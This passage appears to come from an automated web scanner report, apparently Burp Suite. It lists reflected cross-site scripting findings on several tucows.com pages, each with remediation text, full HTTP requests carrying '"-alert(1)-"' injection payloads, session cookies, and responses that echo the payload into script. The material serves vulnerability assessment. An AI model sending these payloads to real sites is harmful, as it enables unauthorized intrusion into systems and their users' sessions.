X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/lostpass.html?10cdc"-alert(1)-"bef9c960c47=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.89. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0054"-alert(1)-"f4d5b36deb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesa0054"-alert(1)-"f4d5b36deb7/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesa0054"-alert(1)-"f4d5b36deb7/newassets/privacy.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.90. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40ac"-alert(1)-"9549b461301 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsa40ac"-alert(1)-"9549b461301/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsa40ac"-alert(1)-"9549b461301/privacy.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.91. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb32"-alert(1)-"50d4670b506 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/privacy.htmlfeb32"-alert(1)-"50d4670b506 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/privacy.htmlfeb32"-alert(1)-"50d4670b506";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.92. http://www.tucows.com/images/newassets/privacy.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1a3a"-alert(1)-"4dfa8e6d415 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/privacy.html?b1a3a"-alert(1)-"4dfa8e6d415=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/privacy.html?b1a3a"-alert(1)-"4dfa8e6d415=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.93. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60f39"-alert(1)-"f5b143ebb35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images60f39"-alert(1)-"f5b143ebb35/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images60f39"-alert(1)-"f5b143ebb35/newassets/safesearchtoggle.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.94. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ffc5"-alert(1)-"d8706d26674 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets7ffc5"-alert(1)-"d8706d26674/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets7ffc5"-alert(1)-"d8706d26674/safesearchtoggle.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.95. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e60fe"-alert(1)-"be3796b76d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/safesearchtoggle.htmle60fe"-alert(1)-"be3796b76d HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/safesearchtoggle.htmle60fe"-alert(1)-"be3796b76d";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.96. http://www.tucows.com/images/newassets/safesearchtoggle.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3b77"-alert(1)-"99a3ca1e499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/safesearchtoggle.html?d3b77"-alert(1)-"99a3ca1e499=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/safesearchtoggle.html?d3b77"-alert(1)-"99a3ca1e499=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.97. http://www.tucows.com/images/newassets/search.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7005"-alert(1)-"da1cff69e08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesa7005"-alert(1)-"da1cff69e08/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesa7005"-alert(1)-"da1cff69e08/newassets/search.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.98. http://www.tucows.com/images/newassets/search.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6080c"-alert(1)-"416c9945040 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets6080c"-alert(1)-"416c9945040/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets6080c"-alert(1)-"416c9945040/search.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.99. http://www.tucows.com/images/newassets/search.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86474"-alert(1)-"fc2d258ee4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/search.html86474"-alert(1)-"fc2d258ee4e HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
